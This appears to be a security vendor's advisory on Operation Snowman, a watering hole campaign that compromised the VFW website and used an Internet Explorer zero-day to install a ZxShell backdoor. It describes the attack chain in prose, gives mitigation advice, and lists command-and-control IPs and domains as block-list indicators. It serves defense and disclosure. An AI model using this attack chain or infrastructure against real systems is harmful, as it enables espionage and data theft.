On February 11, a zero-day exploit was discovered targeting systems running fully patched versions of Internet Explorer 9 or 10.  Malware using this attack was being hosted from the compromised site of the U.S. Veterans of Foreign Wars (VFW) Website, targeting visitors to the site. The attacks seem to be directed at specific targets in the Advanced Persistent Threat, or APT, style commonly attributed to rogue government organizations or other groups with advanced resources.

Targets

Military personnel and others visiting the VFW website using Windows and Internet Explorer 9 or 10 got infected by the malware. The name ‘Snowman’ comes from the snow storm that struck the Northeast and Washington DC/Maryland area closing government offices and keeping Dept. of Defense employees home. The attack was launched to coincide with this storm as many veterans in the Washington DC area work for the Dept. of Defense

Technical details

Watering hole attacks target a business, organization, or group of people by injecting the attack code into websites that the target group frequently visits and trusts. 

Operation Snowman is a watering hole attack campaign that started by compromising the VFW website and altering its HTML code. 

The attackers injected a JavaScript code into the website that created a malicious iFrame. The malicious iFrame then targeted a zero-day bug in Internet Explorer 9 or 10. The bug allows the attackers to bypass two defensive technologies: address space layout randomization (ASLR) and data execution prevention (DEP). The attack, identified by Common Vulnerability Enumeration identifier CVE-2014-0322, installed a backdoor that let the attackers remove data from an infected computer. The malicious JavaScript routine then loaded a Flash object that downloaded a ZxShell backdoor onto the targeted Windows system. 

The ZxShell backdoor is publicly available and has been widely used in several attacks linked to cyber espionage operations. In this instance, the ZxShell backdoor attempted to contact the Command and Control (CnC) server located at domain newss.effers.com, which resolved to IP address 118.99.60.142 at the time of discovery. 

The mentioned domains and IP addresses have been used in other attacks, specifically Operation DeputyDog and Operation Ephemeral Hydra, suggesting that those attacks were organized by the same group, which has previously targeted U.S. government entities, Japanese firms, law firms and IT companies, among others.

How existing security defenses are evaded

Software often has security vulnerabilities, but users have become savvier about avoiding unknown domains. The watering hole method is meant to bypass this behavioral defense by using trusted websites. 

Existing systems do not provide any means for the user to identify a compromised website that used to be trusted. In this case, a previously undiscovered vulnerability, usually referred to as zero-day, was used as the mean to infect the victim systems.

 Infoblox can help protect against this attack

General Best Practices recommendations

Keeping up with patching is one of the best defenses. Keep operating systems and web browsers fully patched, and ensure that third-party patches are applied as soon as possible.

In addition, administrators can ensure that compromised websites hosting malicious content are kept away from end-users by filtering web traffic at the network level. This can be done at URL level or at domain level.

The exploit targets an Internet Explorer releases 9 and 10 vulnerability using Adobe Flash. It will abort if it detects presence of Microsoft’s Experience Mitigation Toolkit (EMET). To avoid infection, install the EMET, upgrade to Internet Explorer 11 and disable Adobe Flash.

Attack-specific recommendations

Infoblox DNS Firewall is an application run on an Infoblox DNS server. It will disrupt  communication by not resolving DNS queries for botnets and CnC servers. All resolved DNS queries are compared to a continually updated table of ‘bad’ domains and IP addresses with which communication should not be allowed. Resolved DNS queries to malicious domains and IP addresses are either blocked or redirected.

Infoblox DNS Firewall blocks resolution to IP address 118.99.60.142. Based on other domains resolving to the same IP 118.99.60.142, the following IPs were identified as potential CnC servers. These IP addresses and domains are also blocked by DNS Firewall:

• 118.99.60.142
• 58.64.200.178
• 58.64.200.179
• 103.20.192.4

The following domains have been linked to the mentioned IPs:

• icybin.flnet.org
• info.flnet.org
• book.flnet.org
• me.scieron.com
• cht.blankchair.com
• ali.blankchair.com
• dll.freshdns.com
• rt.blankchair.com

DNS Firewall Subscription Service updates DNS Firewall servers every 2 hours with updated information on domains and IP addresses (networks) that make up the VFW Snowman infrastructure.

If the Infoblox DHCP and Reporting server are installed, network administrators can pinpoint the infected devices by IP and MAC address, device type (DHCP fingerprinting), Host name (if configured) and DCHP lease history (on/off network).

External sources

• Operation SnowMan: DeputyDog Actor Compromises US Veterans of Foreign Wars Website by FireEye
• New Internet Explorer Zero Day Attack: Operation Snowman by EMSI Soft
• Snowman Attack Campaign Targets IE10 Zero-Day Bug by Information Week
• Internet Explorer 'SnowMan' zero-day spreading: Use alternative or patch with KB 2934088 by InfoWorld
• "Operation Snowman" Group Continues Series of Attacks to Steal Information